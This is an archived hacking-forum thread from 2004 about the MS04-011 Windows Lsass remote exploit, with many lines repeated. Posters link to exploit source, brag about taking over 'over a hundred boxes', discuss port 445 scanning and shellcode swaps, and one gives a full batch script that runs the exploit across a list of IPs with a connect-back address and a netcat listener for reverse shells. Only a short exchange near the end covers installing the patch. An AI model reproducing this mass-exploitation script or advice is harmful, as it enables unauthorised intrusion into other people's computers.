I found many kind of Lsass Exploits here !!!!
But they didn't work....
So which one of them working true and the best ?
Thanks in advance
Full Version: Lsass Exploits !
Hello to all
I found many kind of Lsass Exploits here !!!!
But they didn't work....
So which one of them working true and the best ?
Thanks in advance
I found many kind of Lsass Exploits here !!!!
But they didn't work....
So which one of them working true and the best ?
Thanks in advance
houseofdabus' version works perfectly fine, got a few boxes today 
just use it with netcat and you're good to go
just use it with netcat and you're good to go
they all work.. but i use houseofdabus's version aswell.. i only use this exploit for network hacking though.. the exploit needs netbois and most uni's (if not all) dont let netbios run in or out.. but it does run internally .. and i only do this to let them know they need a patch..
.. and i only do this to let them know they need a patch..
i think rLsasrv.exe is good, i'v got a lot of shell with this exploit...
all work for me.. you can edit the code of houseofdabus to be even better..
I made an autohaxor out of it..
it works perfectly well, load list, press "GO".. over a hundred boxes till now !!
I made an autohaxor out of it..
it works perfectly well, load list, press "GO".. over a hundred boxes till now !!
yes, I think the houseofdabus' version exploit is perfect one.
success rate is 80%.
I know there r alot of this exploit.i have many shell too!
But where can i get :houseofdabus' version ?
But where can i get :houseofdabus' version ?
| CODE |
| http://www.k-otik.com/exploits/04292004.HOD-ms04011-lsasrv-expl.c.php |
| QUOTE |
| I made an autohaxor out of it.. |
can you tell me how ?
I try make autohaxor but it didn't work
Nothing really amazing as its not hardly c++ or anyting else code , but create a auto.bat file ( for example ) and put this in :
| CODE |
@echo off CLS color 70 echo ************************************************************** echo * echo * Windows Lsasrv.dll Remote Universal Exploit XP/2K (MS04-011) echo * echo ************************************************************** pause CLS set /p scan="[-] IPs scan filename :" echo Targets: echo -- 0 [0x01004600]: WinXP Professional [universal] lsass.exe echo -- 1 [0x7515123c]: Win2k Professional [universal] netrap.dll echo -- 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll set /p target="[-] Target :" set /p ip="[-] Connect back IP :" set /p bind="[-] BindPort :" for /f "eol=; tokens=1*" %%i in (%scan%) do lsauniv.exe %target% %%i %bind% %ip% CLS echo [-] End of process , press a key ... pause |
then put this auto.bat in the directory u have : scan.txt ( scan results ) and lsauniv.exe ( according to be the housedabus exploit compiled )
launch auto.bat after u launched netcat listening on bindport you choosed
Little question:
Is there a vulnerability scanner for this vulnerability, or shall I scan port 445?
Thanks.
Is there a vulnerability scanner for this vulnerability, or shall I scan port 445?
Thanks.
yes their is ascanner named DSScan...
oh cool
DDscan is REALY BIG shittt !!!!!!!!!
on GovernmentSecurity.org there is allready posted autohaxor for both systems
XP and 2000.
on GovernmentSecurity.org there is allready posted autohaxor for both systems
XP and 2000.
can anyone tell me how to secure a server hacked with this bug ?
is it possible to install the mspatch in a cmd ?
is it possible to install the mspatch in a cmd ?
| QUOTE (pr3d4ter @ May 2 2004, 09:49 AM) |
| can anyone tell me how to secure a server hacked with this bug ? is it possible to install the mspatch in a cmd ? |
yes it is download it from ms site and do like name.exe /quiet /forcerestart
or what ever options you want nice lost of them on ms site good luck
http://support.microsoft.com/?kbid=835732
according to microsoft, with some hardware it can crash the OS...
according to microsoft, with some hardware it can crash the OS...
has anyone got this expl0it to work sucessfuly with win2k?
dX
dX
can someone provide me with the houseof dead win binary? I was able to port it over to linux but i would like the win32 version since i dont have vc++ to compile.
thank you
thank you
THE EXPLOIT IS GREAT BUT I WANT THE SAME EXPLOIT FOR PORT 139
THANKSX
THANKSX
| QUOTE (dxx @ May 2 2004, 04:44 PM) |
| has anyone got this expl0it to work sucessfuly with win2k? dX |
No I can't get it work on Win2k eather...?! Donno what I'm doin wrong.. :/
The unversal shellcode for xp work but not for win 2k...you must replace the shellcode with a win 2k generic shellcode....a friends made this, but he don't want leak..sorry
the first released lsass.c source will exploit win2k.
If it doesnt work it could be your outgoing port isnt working.
Check that first
If it doesnt work it could be your outgoing port isnt working.
Check that first
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
